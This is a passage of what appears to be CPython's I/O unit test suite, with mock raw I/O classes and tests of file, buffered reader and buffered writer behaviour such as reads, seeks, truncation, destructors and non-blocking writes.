raise IOError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super(MockFileIO, self).__init__(data)
def read(self, n=None):
res = super(MockFileIO, self).read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super(MockFileIO, self).readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data.tobytes(), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(IOError, fp.read)
self.assertRaises(IOError, fp.readline)
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(IOError, fp.write, b"blah")
self.assertRaises(IOError, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(IOError, fp.write, "blah")
self.assertRaises(IOError, fp.writelines, ["blah\n"])
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(TypeError, self.open, fn_with_NUL, 'w')
bytes_fn = fn_with_NUL.encode('ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(TypeError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when next() returns an object without __len__
class R(self.IOBase):
def next(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test comsumes large resources; It takes
# a long time to build the >2GB file and takes >2GB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1 // 0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1 // 0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super(MyFileIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyFileIO, self).close()
def flush(self):
record.append(3)
super(MyFileIO, self).flush()
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super(MyIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super(MyIO, self).close()
def flush(self):
record.append(self.on_flush)
super(MyIO, self).flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array(b'i', range(10))
n = len(a.tostring())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise IOError()
f.flush = bad_flush
self.assertRaises(IOError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with warnings.catch_warnings(record=True) as recorded:
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
support.gc_collect()
self.assertEqual(recorded, [])
def test_invalid_newline(self):
with warnings.catch_warnings(record=True) as recorded:
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
support.gc_collect()
self.assertEqual(recorded, [])
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
stream = Stream()
buffer = byteslike(5)
self.assertEqual(stream.readinto(buffer), 5)
self.assertEqual(buffer.tobytes(), b"12345")
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
test_array_writes = unittest.skip(
"len(array.array) returns number of elements rather than bytelength"
)(IOTest.test_array_writes)
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 3)
@unittest.skipIf(sys.platform == 'cli', 'Bad behaviour on ipy')
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super(MyBufferedIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyBufferedIO, self).close()
def flush(self):
record.append(3)
super(MyBufferedIO, self).flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__name__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name=u'dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise IOError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(IOError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise IOError('flush')
def bad_close():
raise IOError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(IOError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises((AttributeError, TypeError)):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(IOError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents,
b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
